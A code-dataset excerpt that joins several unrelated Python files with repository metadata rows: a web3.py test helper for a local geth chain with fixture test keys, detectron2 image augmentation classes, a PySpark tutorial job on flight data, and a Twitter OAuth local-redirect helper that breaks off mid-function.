from web3.exceptions import (
TransactionNotFound,
)
COINBASE = '0xdc544d1aa88ff8bbd2f2aec754b1f1e99e1812fd'
COINBASE_PK = '0x58d23b55bc9cdce1f18c2500f40ff4ab7245df9a89505e9b1fa4851f623d241d'
KEYFILE_DATA = '{"address":"dc544d1aa88ff8bbd2f2aec754b1f1e99e1812fd","crypto":{"cipher":"aes-128-ctr","ciphertext":"52e06bc9397ea9fa2f0dae8de2b3e8116e92a2ecca9ad5ff0061d1c449704e98","cipherparams":{"iv":"aa5d0a5370ef65395c1a6607af857124"},"kdf":"scrypt","kdfparams":{"dklen":32,"n":262144,"p":1,"r":8,"salt":"9fdf0764eb3645ffc184e166537f6fe70516bf0e34dc7311dea21f100f0c9263"},"mac":"4e0b51f42b865c15c485f4faefdd1f01a38637e5247f8c75ffe6a8c0eba856f6"},"id":"5a6124e0-10f1-4c1c-ae3e-d903eacb740a","version":3}' # noqa: E501
KEYFILE_PW = 'web3py-test'
KEYFILE_FILENAME = 'UTC--2017-08-24T19-42-47.517572178Z--dc544d1aa88ff8bbd2f2aec754b1f1e99e1812fd' # noqa: E501
RAW_TXN_ACCOUNT = '0x39EEed73fb1D3855E90Cbd42f348b3D7b340aAA6'
UNLOCKABLE_PRIVATE_KEY = '0x392f63a79b1ff8774845f3fa69de4a13800a59e7083f5187f1558f0797ad0f01'
UNLOCKABLE_ACCOUNT = '0x12efdc31b1a8fa1a1e756dfd8a1601055c971e13'
UNLOCKABLE_ACCOUNT_PW = KEYFILE_PW
GENESIS_DATA = {
"config": {
"chainId": 1337,
"homesteadBlock": 0,
"eip150Block": 0,
"eip155Block": 10,
"eip158Block": 10,
"eip160Block": 10,
},
"nonce": "0x0000000000000042",
"alloc": {
COINBASE: {
"balance": "1000000000000000000000000000"
},
UNLOCKABLE_ACCOUNT: {
"balance": "1000000000000000000000000000"
},
RAW_TXN_ACCOUNT: {
"balance": "1000000000000000000000000000"
}
},
"timestamp": "0x00",
"parentHash": "0x0000000000000000000000000000000000000000000000000000000000000000",
"extraData": "0x3535353535353535353535353535353535353535353535353535353535353535",
"gasLimit": "0x1000000",
"difficulty": "0x10000",
"mixhash": "0x0000000000000000000000000000000000000000000000000000000000000000",
"coinbase": COINBASE
}
def ensure_path_exists(dir_path):
"""
Make sure that a path exists
"""
if not os.path.exists(dir_path):
os.makedirs(dir_path)
return True
return False
@contextlib.contextmanager
def tempdir():
dir_path = tempfile.mkdtemp()
try:
yield dir_path
finally:
shutil.rmtree(dir_path)
def get_geth_binary():
from geth.install import (
get_executable_path,
install_geth,
)
if 'GETH_BINARY' in os.environ:
return os.environ['GETH_BINARY']
elif 'GETH_VERSION' in os.environ:
geth_version = os.environ['GETH_VERSION']
_geth_binary = get_executable_path(geth_version)
if not os.path.exists(_geth_binary):
install_geth(geth_version)
assert os.path.exists(_geth_binary)
return _geth_binary
else:
return 'geth'
def wait_for_popen(proc, timeout):
start = time.time()
while time.time() < start + timeout:
if proc.poll() is None:
time.sleep(0.01)
else:
break
def kill_proc_gracefully(proc):
if proc.poll() is None:
proc.send_signal(signal.SIGINT)
wait_for_popen(proc, 13)
if proc.poll() is None:
proc.terminate()
wait_for_popen(proc, 5)
if proc.poll() is None:
proc.kill()
wait_for_popen(proc, 2)
def wait_for_socket(ipc_path, timeout=30):
start = time.time()
while time.time() < start + timeout:
try:
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
sock.connect(ipc_path)
sock.settimeout(timeout)
except (FileNotFoundError, socket.error):
time.sleep(0.01)
else:
break
@contextlib.contextmanager
def get_geth_process(geth_binary,
datadir,
genesis_file_path,
ipc_path,
port,
networkid,
skip_init=False):
if not skip_init:
init_datadir_command = (
geth_binary,
'--datadir', datadir,
'init',
genesis_file_path,
)
print(' '.join(init_datadir_command))
subprocess.check_output(
init_datadir_command,
stdin=subprocess.PIPE,
stderr=subprocess.PIPE,
)
run_geth_command = (
geth_binary,
'--datadir', datadir,
'--ipcpath', ipc_path,
'--nodiscover',
'--port', port,
'--networkid', networkid,
'--etherbase', COINBASE[2:],
)
print(' '.join(run_geth_command))
try:
proc = get_process(run_geth_command)
yield proc
finally:
kill_proc_gracefully(proc)
output, errors = proc.communicate()
print(
"Geth Process Exited:\n"
"stdout:{0}\n\n"
"stderr:{1}\n\n".format(
to_text(output),
to_text(errors),
)
)
def get_process(run_command):
proc = subprocess.Popen(
run_command,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
bufsize=1,
)
return proc
def mine_block(web3):
origin_block_number = web3.eth.blockNumber
start_time = time.time()
web3.geth.miner.start(1)
while time.time() < start_time + 120:
block_number = web3.eth.blockNumber
if block_number > origin_block_number:
web3.geth.miner.stop()
return block_number
else:
time.sleep(0.1)
else:
raise ValueError("No block mined during wait period")
def mine_transaction_hash(web3, txn_hash):
start_time = time.time()
web3.geth.miner.start(1)
while time.time() < start_time + 120:
try:
receipt = web3.eth.getTransactionReceipt(txn_hash)
except TransactionNotFound:
continue
if receipt is not None:
web3.geth.miner.stop()
return receipt
else:
time.sleep(0.1)
else:
raise ValueError("Math contract deploy transaction not mined during wait period")
def deploy_contract(web3, name, factory):
web3.geth.personal.unlockAccount(web3.eth.coinbase, KEYFILE_PW)
deploy_txn_hash = factory.constructor().transact({'from': web3.eth.coinbase})
print('{0}_CONTRACT_DEPLOY_HASH: '.format(name.upper()), deploy_txn_hash)
deploy_receipt = mine_transaction_hash(web3, deploy_txn_hash)
print('{0}_CONTRACT_DEPLOY_TRANSACTION_MINED'.format(name.upper()))
contract_address = deploy_receipt['contractAddress']
assert is_checksum_address(contract_address)
print('{0}_CONTRACT_ADDRESS:'.format(name.upper()), contract_address)
return deploy_receipt
| 29.216667 | 522 | 0.642042 |
4a1e494b1e8cf4a5039ef6a43c0f89346ada670b | 22,339 | py | Python | detectron2/data/transforms/augmentation_impl.py | sourcery-ai-bot/detectron2 | fd0c5c59afbdc43f7005fb1a8c0c39ac5dc44039 | [
"Apache-2.0"
] | null | null | null | detectron2/data/transforms/augmentation_impl.py | sourcery-ai-bot/detectron2 | fd0c5c59afbdc43f7005fb1a8c0c39ac5dc44039 | [
"Apache-2.0"
] | null | null | null | detectron2/data/transforms/augmentation_impl.py | sourcery-ai-bot/detectron2 | fd0c5c59afbdc43f7005fb1a8c0c39ac5dc44039 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Copyright (c) Facebook, Inc. and its affiliates.
"""
Implement many useful :class:`Augmentation`.
"""
import numpy as np
import sys
from typing import Tuple
from fvcore.transforms.transform import (
BlendTransform,
CropTransform,
HFlipTransform,
NoOpTransform,
PadTransform,
Transform,
TransformList,
VFlipTransform,
)
from PIL import Image
from .augmentation import Augmentation, _transform_to_aug
from .transform import ExtentTransform, ResizeTransform, RotationTransform
__all__ = [
"FixedSizeCrop",
"RandomApply",
"RandomBrightness",
"RandomContrast",
"RandomCrop",
"RandomExtent",
"RandomFlip",
"RandomSaturation",
"RandomLighting",
"RandomRotation",
"Resize",
"ResizeScale",
"ResizeShortestEdge",
"RandomCrop_CategoryAreaConstraint",
]
class RandomApply(Augmentation):
"""
Randomly apply an augmentation with a given probability.
"""
def __init__(self, tfm_or_aug, prob=0.5):
"""
Args:
tfm_or_aug (Transform, Augmentation): the transform or augmentation
to be applied. It can either be a `Transform` or `Augmentation`
instance.
prob (float): probability between 0.0 and 1.0 that
the wrapper transformation is applied
"""
super().__init__()
self.aug = _transform_to_aug(tfm_or_aug)
assert 0.0 <= prob <= 1.0, f"Probablity must be between 0.0 and 1.0 (given: {prob})"
self.prob = prob
def get_transform(self, *args):
do = self._rand_range() < self.prob
return self.aug.get_transform(*args) if do else NoOpTransform()
def __call__(self, aug_input):
do = self._rand_range() < self.prob
return self.aug(aug_input) if do else NoOpTransform()
class RandomFlip(Augmentation):
"""
Flip the image horizontally or vertically with the given probability.
"""
def __init__(self, prob=0.5, *, horizontal=True, vertical=False):
"""
Args:
prob (float): probability of flip.
horizontal (boolean): whether to apply horizontal flipping
vertical (boolean): whether to apply vertical flipping
"""
super().__init__()
if horizontal and vertical:
raise ValueError("Cannot do both horiz and vert. Please use two Flip instead.")
if not horizontal and not vertical:
raise ValueError("At least one of horiz or vert has to be True!")
self._init(locals())
def get_transform(self, image):
h, w = image.shape[:2]
do = self._rand_range() < self.prob
if do:
if self.horizontal:
return HFlipTransform(w)
elif self.vertical:
return VFlipTransform(h)
else:
return NoOpTransform()
class Resize(Augmentation):
"""Resize image to a fixed target size"""
def __init__(self, shape, interp=Image.BILINEAR):
"""
Args:
shape: (h, w) tuple or a int
interp: PIL interpolation method
"""
if isinstance(shape, int):
shape = (shape, shape)
shape = tuple(shape)
self._init(locals())
def get_transform(self, image):
return ResizeTransform(
image.shape[0], image.shape[1], self.shape[0], self.shape[1], self.interp
)
class ResizeShortestEdge(Augmentation):
"""
Scale the shorter edge to the given size, with a limit of `max_size` on the longer edge.
If `max_size` is reached, then downscale so that the longer edge does not exceed max_size.
"""
def __init__(
self, short_edge_length, max_size=sys.maxsize, sample_style="range", interp=Image.BILINEAR
):
"""
Args:
short_edge_length (list[int]): If ``sample_style=="range"``,
a [min, max] interval from which to sample the shortest edge length.
If ``sample_style=="choice"``, a list of shortest edge lengths to sample from.
max_size (int): maximum allowed longest edge length.
sample_style (str): either "range" or "choice".
"""
super().__init__()
assert sample_style in ["range", "choice"], sample_style
self.is_range = sample_style == "range"
if isinstance(short_edge_length, int):
short_edge_length = (short_edge_length, short_edge_length)
if self.is_range:
assert len(short_edge_length) == 2, (
"short_edge_length must be two values using 'range' sample style."
f" Got {short_edge_length}!"
)
self._init(locals())
def get_transform(self, image):
h, w = image.shape[:2]
if self.is_range:
size = np.random.randint(self.short_edge_length[0], self.short_edge_length[1] + 1)
else:
size = np.random.choice(self.short_edge_length)
if size == 0:
return NoOpTransform()
scale = size * 1.0 / min(h, w)
newh, neww = (size, scale * w) if h < w else (scale * h, size)
if max(newh, neww) > self.max_size:
scale = self.max_size * 1.0 / max(newh, neww)
newh = newh * scale
neww = neww * scale
neww = int(neww + 0.5)
newh = int(newh + 0.5)
return ResizeTransform(h, w, newh, neww, self.interp)
class ResizeScale(Augmentation):
"""
Takes target size as input and randomly scales the given target size between `min_scale`
and `max_scale`. It then scales the input image such that it fits inside the scaled target
box, keeping the aspect ratio constant.
This implements the resize part of the Google's 'resize_and_crop' data augmentation:
https://github.com/tensorflow/tpu/blob/master/models/official/detection/utils/input_utils.py#L127
"""
def __init__(
self,
min_scale: float,
max_scale: float,
target_height: int,
target_width: int,
interp: int = Image.BILINEAR,
):
"""
Args:
min_scale: minimum image scale range.
max_scale: maximum image scale range.
target_height: target image height.
target_width: target image width.
interp: image interpolation method.
"""
super().__init__()
self._init(locals())
def _get_resize(self, image: np.ndarray, scale: float) -> Transform:
input_size = image.shape[:2]
# Compute new target size given a scale.
target_size = (self.target_height, self.target_width)
target_scale_size = np.multiply(target_size, scale)
# Compute actual rescaling applied to input image and output size.
output_scale = np.minimum(
target_scale_size[0] / input_size[0], target_scale_size[1] / input_size[1]
)
output_size = np.round(np.multiply(input_size, output_scale)).astype(int)
return ResizeTransform(
input_size[0], input_size[1], output_size[0], output_size[1], self.interp
)
def get_transform(self, image: np.ndarray) -> Transform:
random_scale = np.random.uniform(self.min_scale, self.max_scale)
return self._get_resize(image, random_scale)
class RandomRotation(Augmentation):
"""
This method returns a copy of this image, rotated the given
number of degrees counter clockwise around the given center.
"""
def __init__(self, angle, expand=True, center=None, sample_style="range", interp=None):
"""
Args:
angle (list[float]): If ``sample_style=="range"``,
a [min, max] interval from which to sample the angle (in degrees).
If ``sample_style=="choice"``, a list of angles to sample from
expand (bool): choose if the image should be resized to fit the whole
rotated image (default), or simply cropped
center (list[[float, float]]): If ``sample_style=="range"``,
a [[minx, miny], [maxx, maxy]] relative interval from which to sample the center,
[0, 0] being the top left of the image and [1, 1] the bottom right.
If ``sample_style=="choice"``, a list of centers to sample from
Default: None, which means that the center of rotation is the center of the image
center has no effect if expand=True because it only affects shifting
"""
super().__init__()
assert sample_style in ["range", "choice"], sample_style
self.is_range = sample_style == "range"
if isinstance(angle, (float, int)):
angle = (angle, angle)
if center is not None and isinstance(center[0], (float, int)):
center = (center, center)
self._init(locals())
def get_transform(self, image):
h, w = image.shape[:2]
center = None
if self.is_range:
angle = np.random.uniform(self.angle[0], self.angle[1])
if self.center is not None:
center = (
np.random.uniform(self.center[0][0], self.center[1][0]),
np.random.uniform(self.center[0][1], self.center[1][1]),
)
else:
angle = np.random.choice(self.angle)
if self.center is not None:
center = np.random.choice(self.center)
if center is not None:
center = (w * center[0], h * center[1]) # Convert to absolute coordinates
if angle % 360 == 0:
return NoOpTransform()
return RotationTransform(h, w, angle, expand=self.expand, center=center, interp=self.interp)
class FixedSizeCrop(Augmentation):
"""
If `crop_size` is smaller than the input image size, then it uses a random crop of
the crop size. If `crop_size` is larger than the input image size, then it pads
the right and the bottom of the image to the crop size if `pad` is True, otherwise
it returns the smaller image.
"""
def __init__(self, crop_size: Tuple[int], pad: bool = True, pad_value: float = 128.0):
"""
Args:
crop_size: target image (height, width).
pad: if True, will pad images smaller than `crop_size` up to `crop_size`
pad_value: the padding value.
"""
super().__init__()
self._init(locals())
def _get_crop(self, image: np.ndarray) -> Transform:
# Compute the image scale and scaled size.
input_size = image.shape[:2]
output_size = self.crop_size
# Add random crop if the image is scaled up.
max_offset = np.subtract(input_size, output_size)
max_offset = np.maximum(max_offset, 0)
offset = np.multiply(max_offset, np.random.uniform(0.0, 1.0))
offset = np.round(offset).astype(int)
return CropTransform(
offset[1], offset[0], output_size[1], output_size[0], input_size[1], input_size[0]
)
def _get_pad(self, image: np.ndarray) -> Transform:
# Compute the image scale and scaled size.
input_size = image.shape[:2]
output_size = self.crop_size
# Add padding if the image is scaled down.
pad_size = np.subtract(output_size, input_size)
pad_size = np.maximum(pad_size, 0)
original_size = np.minimum(input_size, output_size)
return PadTransform(
0, 0, pad_size[1], pad_size[0], original_size[1], original_size[0], self.pad_value
)
def get_transform(self, image: np.ndarray) -> TransformList:
transforms = [self._get_crop(image)]
if self.pad:
transforms.append(self._get_pad(image))
return TransformList(transforms)
class RandomCrop(Augmentation):
"""
Randomly crop a rectangle region out of an image.
"""
def __init__(self, crop_type: str, crop_size):
"""
Args:
crop_type (str): one of "relative_range", "relative", "absolute", "absolute_range".
crop_size (tuple[float, float]): two floats, explained below.
- "relative": crop a (H * crop_size[0], W * crop_size[1]) region from an input image of
size (H, W). crop size should be in (0, 1]
- "relative_range": uniformly sample two values from [crop_size[0], 1]
and [crop_size[1]], 1], and use them as in "relative" crop type.
- "absolute" crop a (crop_size[0], crop_size[1]) region from input image.
crop_size must be smaller than the input image size.
- "absolute_range", for an input of size (H, W), uniformly sample H_crop in
[crop_size[0], min(H, crop_size[1])] and W_crop in [crop_size[0], min(W, crop_size[1])].
Then crop a region (H_crop, W_crop).
"""
# TODO style of relative_range and absolute_range are not consistent:
# one takes (h, w) but another takes (min, max)
super().__init__()
assert crop_type in {
"relative_range",
"relative",
"absolute",
"absolute_range",
}
self._init(locals())
def get_transform(self, image):
h, w = image.shape[:2]
croph, cropw = self.get_crop_size((h, w))
assert h >= croph and w >= cropw, "Shape computation in {} has bugs.".format(self)
h0 = np.random.randint(h - croph + 1)
w0 = np.random.randint(w - cropw + 1)
return CropTransform(w0, h0, cropw, croph)
def get_crop_size(self, image_size):
"""
Args:
image_size (tuple): height, width
Returns:
crop_size (tuple): height, width in absolute pixels
"""
h, w = image_size
if self.crop_type == "relative":
ch, cw = self.crop_size
return int(h * ch + 0.5), int(w * cw + 0.5)
elif self.crop_type == "relative_range":
crop_size = np.asarray(self.crop_size, dtype=np.float32)
ch, cw = crop_size + np.random.rand(2) * (1 - crop_size)
return int(h * ch + 0.5), int(w * cw + 0.5)
elif self.crop_type == "absolute":
return (min(self.crop_size[0], h), min(self.crop_size[1], w))
elif self.crop_type == "absolute_range":
assert self.crop_size[0] <= self.crop_size[1]
ch = np.random.randint(min(h, self.crop_size[0]), min(h, self.crop_size[1]) + 1)
cw = np.random.randint(min(w, self.crop_size[0]), min(w, self.crop_size[1]) + 1)
return ch, cw
else:
NotImplementedError("Unknown crop type {}".format(self.crop_type))
class RandomCrop_CategoryAreaConstraint(Augmentation):
"""
Similar to :class:`RandomCrop`, but find a cropping window such that no single category
occupies a ratio of more than `single_category_max_area` in semantic segmentation ground
truth, which can cause unstability in training. The function attempts to find such a valid
cropping window for at most 10 times.
"""
def __init__(
self,
crop_type: str,
crop_size,
single_category_max_area: float = 1.0,
ignored_category: int = None,
):
"""
Args:
crop_type, crop_size: same as in :class:`RandomCrop`
single_category_max_area: the maximum allowed area ratio of a
category. Set to 1.0 to disable
ignored_category: allow this category in the semantic segmentation
ground truth to exceed the area ratio. Usually set to the category
that's ignored in training.
"""
self.crop_aug = RandomCrop(crop_type, crop_size)
self._init(locals())
def get_transform(self, image, sem_seg):
if self.single_category_max_area >= 1.0:
return self.crop_aug.get_transform(image)
h, w = sem_seg.shape
for _ in range(10):
crop_size = self.crop_aug.get_crop_size((h, w))
y0 = np.random.randint(h - crop_size[0] + 1)
x0 = np.random.randint(w - crop_size[1] + 1)
sem_seg_temp = sem_seg[y0 : y0 + crop_size[0], x0 : x0 + crop_size[1]]
labels, cnt = np.unique(sem_seg_temp, return_counts=True)
if self.ignored_category is not None:
cnt = cnt[labels != self.ignored_category]
if len(cnt) > 1 and np.max(cnt) < np.sum(cnt) * self.single_category_max_area:
break
return CropTransform(x0, y0, crop_size[1], crop_size[0])
class RandomExtent(Augmentation):
"""
Outputs an image by cropping a random "subrect" of the source image.
The subrect can be parameterized to include pixels outside the source image,
in which case they will be set to zeros (i.e. black). The size of the output
image will vary with the size of the random subrect.
"""
def __init__(self, scale_range, shift_range):
"""
Args:
output_size (h, w): Dimensions of output image
scale_range (l, h): Range of input-to-output size scaling factor
shift_range (x, y): Range of shifts of the cropped subrect. The rect
is shifted by [w / 2 * Uniform(-x, x), h / 2 * Uniform(-y, y)],
where (w, h) is the (width, height) of the input image. Set each
component to zero to crop at the image's center.
"""
super().__init__()
self._init(locals())
def get_transform(self, image):
img_h, img_w = image.shape[:2]
# Initialize src_rect to fit the input image.
src_rect = np.array([-0.5 * img_w, -0.5 * img_h, 0.5 * img_w, 0.5 * img_h])
# Apply a random scaling to the src_rect.
src_rect *= np.random.uniform(self.scale_range[0], self.scale_range[1])
# Apply a random shift to the coordinates origin.
src_rect[0::2] += self.shift_range[0] * img_w * (np.random.rand() - 0.5)
src_rect[1::2] += self.shift_range[1] * img_h * (np.random.rand() - 0.5)
# Map src_rect coordinates into image coordinates (center at corner).
src_rect[0::2] += 0.5 * img_w
src_rect[1::2] += 0.5 * img_h
return ExtentTransform(
src_rect=(src_rect[0], src_rect[1], src_rect[2], src_rect[3]),
output_size=(int(src_rect[3] - src_rect[1]), int(src_rect[2] - src_rect[0])),
)
class RandomContrast(Augmentation):
"""
Randomly transforms image contrast.
Contrast intensity is uniformly sampled in (intensity_min, intensity_max).
- intensity < 1 will reduce contrast
- intensity = 1 will preserve the input image
- intensity > 1 will increase contrast
See: https://pillow.readthedocs.io/en/3.0.x/reference/ImageEnhance.html
"""
def __init__(self, intensity_min, intensity_max):
"""
Args:
intensity_min (float): Minimum augmentation
intensity_max (float): Maximum augmentation
"""
super().__init__()
self._init(locals())
def get_transform(self, image):
w = np.random.uniform(self.intensity_min, self.intensity_max)
return BlendTransform(src_image=image.mean(), src_weight=1 - w, dst_weight=w)
class RandomBrightness(Augmentation):
"""
Randomly transforms image brightness.
Brightness intensity is uniformly sampled in (intensity_min, intensity_max).
- intensity < 1 will reduce brightness
- intensity = 1 will preserve the input image
- intensity > 1 will increase brightness
See: https://pillow.readthedocs.io/en/3.0.x/reference/ImageEnhance.html
"""
def __init__(self, intensity_min, intensity_max):
"""
Args:
intensity_min (float): Minimum augmentation
intensity_max (float): Maximum augmentation
"""
super().__init__()
self._init(locals())
def get_transform(self, image):
w = np.random.uniform(self.intensity_min, self.intensity_max)
return BlendTransform(src_image=0, src_weight=1 - w, dst_weight=w)
class RandomSaturation(Augmentation):
"""
Randomly transforms saturation of an RGB image.
Input images are assumed to have 'RGB' channel order.
Saturation intensity is uniformly sampled in (intensity_min, intensity_max).
- intensity < 1 will reduce saturation (make the image more grayscale)
- intensity = 1 will preserve the input image
- intensity > 1 will increase saturation
See: https://pillow.readthedocs.io/en/3.0.x/reference/ImageEnhance.html
"""
def __init__(self, intensity_min, intensity_max):
"""
Args:
intensity_min (float): Minimum augmentation (1 preserves input).
intensity_max (float): Maximum augmentation (1 preserves input).
"""
super().__init__()
self._init(locals())
def get_transform(self, image):
assert image.shape[-1] == 3, "RandomSaturation only works on RGB images"
w = np.random.uniform(self.intensity_min, self.intensity_max)
grayscale = image.dot([0.299, 0.587, 0.114])[:, :, np.newaxis]
return BlendTransform(src_image=grayscale, src_weight=1 - w, dst_weight=w)
class RandomLighting(Augmentation):
"""
The "lighting" augmentation described in AlexNet, using fixed PCA over ImageNet.
Input images are assumed to have 'RGB' channel order.
The degree of color jittering is randomly sampled via a normal distribution,
with standard deviation given by the scale parameter.
"""
def __init__(self, scale):
"""
Args:
scale (float): Standard deviation of principal component weighting.
"""
super().__init__()
self._init(locals())
self.eigen_vecs = np.array(
[[-0.5675, 0.7192, 0.4009], [-0.5808, -0.0045, -0.8140], [-0.5836, -0.6948, 0.4203]]
)
self.eigen_vals = np.array([0.2175, 0.0188, 0.0045])
def get_transform(self, image):
assert image.shape[-1] == 3, "RandomLighting only works on RGB images"
weights = np.random.normal(scale=self.scale, size=3)
return BlendTransform(
src_image=self.eigen_vecs.dot(weights * self.eigen_vals), src_weight=1.0, dst_weight=1.0
)
| 37.671164 | 101 | 0.613501 |
4a1e499539aa3c940c600a26cfdaa4668138ff20 | 3,695 | py | Python | jobs/pyspark_job_2.py | blnwrly/cdsw-training | ace71ece16bb9108ad38d426a5ab41955011f2c4 | [
"Apache-2.0"
] | null | null | null | jobs/pyspark_job_2.py | blnwrly/cdsw-training | ace71ece16bb9108ad38d426a5ab41955011f2c4 | [
"Apache-2.0"
] | null | null | null | jobs/pyspark_job_2.py | blnwrly/cdsw-training | ace71ece16bb9108ad38d426a5ab41955011f2c4 | [
"Apache-2.0"
] | null | null | null | # Copyright 2021 Cloudera, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pyspark
from pyspark.sql import SparkSession
spark = SparkSession.builder \
.appName('spark-job') \
.getOrCreate()
flights = spark.read.csv('data/flights.csv', header=True, inferSchema=True)
# ## Transforming Data
# Spark SQL provides a set of functions for manipulating
# Spark DataFrames. Each of these methods returns a
# new DataFrame.
# `select()` returns the specified columns:
flights.select('carrier').show()
# `distinct()` returns distinct rows:
flights.select('carrier').distinct().show()
# `filter()` (or its alias `where()`) returns rows that
# satisfy a Boolean expression.
# To disambiguate column names and literal strings,
# import and use the functions `col()` and `lit()`:
from pyspark.sql.functions import col, lit
flights.filter(col('dest') == lit('SFO')).show()
# `orderBy()` (or its alias `sort()`) returns rows
# arranged by the specified columns:
flights.orderBy('month', 'day').show()
flights.orderBy('month', 'day', ascending=False).show()
# `withColumn()` adds a new column or replaces an existing
# column using the specified expression:
flights \
.withColumn('on_time', col('arr_delay') <= 0) \
.show()
# To concatenate strings, import and use the function
# `concat()`:
from pyspark.sql.functions import concat
flights \
.withColumn('flight_code', concat('carrier', 'flight')) \
.show()
# `agg()` performs aggregations using the specified
# expressions.
# Import and use aggregation functions such as `count()`,
# `countDistinct()`, `sum()`, and `mean()`:
from pyspark.sql.functions import count, countDistinct
flights.agg(count('*')).show()
flights.agg(countDistinct('carrier')).show()
# Use the `alias()` method to assign a name to name the
# resulting column:
flights \
.agg(countDistinct('carrier').alias('num_carriers')) \
.show()
# `groupBy()` groups data by the specified columns, so
# aggregations can be computed by group:
from pyspark.sql.functions import mean
flights \
.groupBy('origin') \
.agg( \
count('*').alias('num_departures'), \
mean('dep_delay').alias('avg_dep_delay') \
) \
.show()
# By chaining together multiple DataFrame methods, you
# can analyze data to answer questions. For example:
# How many flights to SFO departed from each airport,
# and what was the average departure delay (in minutes)?
flights \
.filter(col('dest') == lit('SFO')) \
.groupBy('origin') \
.agg( \
count('*').alias('num_departures'), \
mean('dep_delay').alias('avg_dep_delay') \
) \
.orderBy('avg_dep_delay') \
.show()
# ## Using SQL Queries
# Instead of using Spark DataFrame methods, you can
# use a SQL query to achieve the same result.
# First you must create a temporary view with the
# DataFrame you want to query:
flights.createOrReplaceTempView('nyc_flights_2013')
# Then you can use SQL to query the DataFrame:
spark.sql("""
SELECT origin,
COUNT(*) AS num_departures,
AVG(dep_delay) AS avg_dep_delay
FROM nyc_flights_2013
WHERE dest = 'SFO'
GROUP BY origin
ORDER BY avg_dep_delay""").show()
# ## Cleanup
# Stop the Spark application:
spark.stop()
| 24.966216 | 75 | 0.707442 |
4a1e4997c8f99c301b78532e6e6ac79f8e9dde27 | 5,480 | py | Python | twitterAuthorization/main.py | actlaboratory/twitter-authorization | aa78fd569576d6d81fbf1ace55ad0511e8498b56 | [
"MIT"
] | null | null | null | twitterAuthorization/main.py | actlaboratory/twitter-authorization | aa78fd569576d6d81fbf1ace55ad0511e8498b56 | [
"MIT"
] | null | null | null | twitterAuthorization/main.py | actlaboratory/twitter-authorization | aa78fd569576d6d81fbf1ace55ad0511e8498b56 | [
"MIT"
] | null | null | null | import threading
import wsgiref.util
from wsgiref.simple_server import make_server
import http.server
import socketserver
import socket
import tweepy
import urllib.parse
def server_bind(self):
"""Override server_bind to fix UnicodeDecodeError when computer name has non-ascii characters."""
socketserver.TCPServer.server_bind(self)
host, port = self.server_address[:2]
try:
self.server_name = socket.getfqdn(host)
except UnicodeDecodeError:
self.server_name = "localhost"
self.server_port = port
http.server.HTTPServer.server_bind = server_bind
class TwitterAuthorization:
def __init__(self,consumerKey,consumerSecret,receivePort):
"""
Args:
consumerKey (string): The consumerKey from Twitter developper portal
consumerSecret (string): The consumerSecret from Twitter developper portal
receivedPort (string): The port number to receive request
"""
self.result=None
self.key = consumerKey
self.secret = consumerSecret
self.port = receivePort
self.localServer = None
#generate request URL
self.tweepy = tweepy.OAuthHandler(self.key, self.secret,"http://localhost:%d" % self.port)
try:
self.url = self.tweepy.get_authorization_url()
except tweepy.TweepError as e:
raise Exception(e)
#start local web server
self.wsgi_app = _RedirectWSGIApp(
self.port,
self._registToken,
self._failedRequest
)
self.localServer = wsgiref.simple_server.make_server("localhost", self.port, self.wsgi_app, handler_class=_WSGIRequestHandler)
thread = threading.Thread(target=self._localServerThread,args=(self.localServer,))
thread.start()
def setMessage(self,lang,success,failed,transfer):
"""
Set Message that viewd in browser
Args:
lang (string): The message language code (ex:ja,en,...)
success (string): The success message
failed (string): The failed message
transfer (string): The transfer error message that appear in old or Javascript disabled browser
"""
self.wsgi_app.setMessage(lang,success,failed,transfer)
def getUrl(self):
"""
Get Authorization url
Returns:
AuthorizationUrl (string)
"""
return self.url
def getToken(self):
"""
Get accesstoken (success), "" (failed) or None (waiting)
If returned "" and the browser stays open, software should close that.
Returns:
tokenData (dict) or None
"""
if self.result!=None:
self.shutdown()
return self.result
def _registToken(self,result):
self.result = self.tweepy.get_access_token(result["oauth_verifier"][0])
#(result["oauth_token"][0]
def _failedRequest(self):
self.result=""
def __del__(self):
self.shutdown()
def shutdown(self):
if self.localServer:
self.localServer.shutdown()
self.localServer=None
def _localServerThread(self,server):
server.serve_forever()
class _WSGIRequestHandler(wsgiref.simple_server.WSGIRequestHandler):
def __init__(self,*args,**argv):
super().__init__(*args,*argv)
#コネクションは毎回切断する
self.close_connection=True
def log_message(self, *args):
#disable logger
pass
class _RedirectWSGIApp(object):
"""
WSGI app to handle the authorization redirect.
Stores the request URI and displays the given success message.
"""
def __init__(self, port, hook,failedHook):
"""
Args:
port (int): The port number That receive request
hook (callable): The function when got token
failedHook (callable): The function when authorization failed (ex: disagreed authorize)
"""
self.successMessage="Authorization successful. Close this window and go back to your application."
self.failedMessage="Authorization failed. Please try again."
self.transferMessage="If the screen does not change after a while, open this page in another browser."
self.lang = "ja"
self.port = port
self.hook = hook
self.failedHook = failedHook
def setMessage(self,lang,success,failed,transfer):
"""
Set Message that viewd in browser
Args:
lang (string): The message language code (ex:ja,en,...)
success (string): The success message
failed (string): The failed message
transfer (string): The transfer error message that appear in old or Javascript disabled browser
"""
self.lang=lang
self.successMessage=success
self.failedMessage=failed
self.transferMessage=transfer
def __call__(self, environ, start_response):
"""
Args:
environ (Mapping[str, Any]): The WSGI environment.
start_response (Callable[str, list]): The WSGI start_response
callable.
Returns:
Iterable[bytes]: The response body.
"""
try:
uri = wsgiref.util.request_uri(environ)
query = urllib.parse.urlparse(uri).query
queryDic = urllib.parse.parse_qs(query)
#例外発生しなければ正当なリクエスト
#サーバ側で処理
if query != "":
self.hook(queryDic)
start_response('200 OK', [('Content-type', 'text/html; charset=utf-8')])
response=[("<html lang='"+self.lang+"'><head><title>Authorization result</title><meta charset='utf-8'></head><body>"+self.successMessage+"<script><!--\n").encode('utf-8')]
response.append("window.close()\n".encode("utf-8"))
response.append("--></script></body></html>".encode("utf-8"))
return response
except Exception as e:
if query != "": #favicon.icoなどの不要なリクエストへの対策
self.failedHook()
start_response('400 Bad Request', [('Content-type', 'text/html; charset=utf-8')])
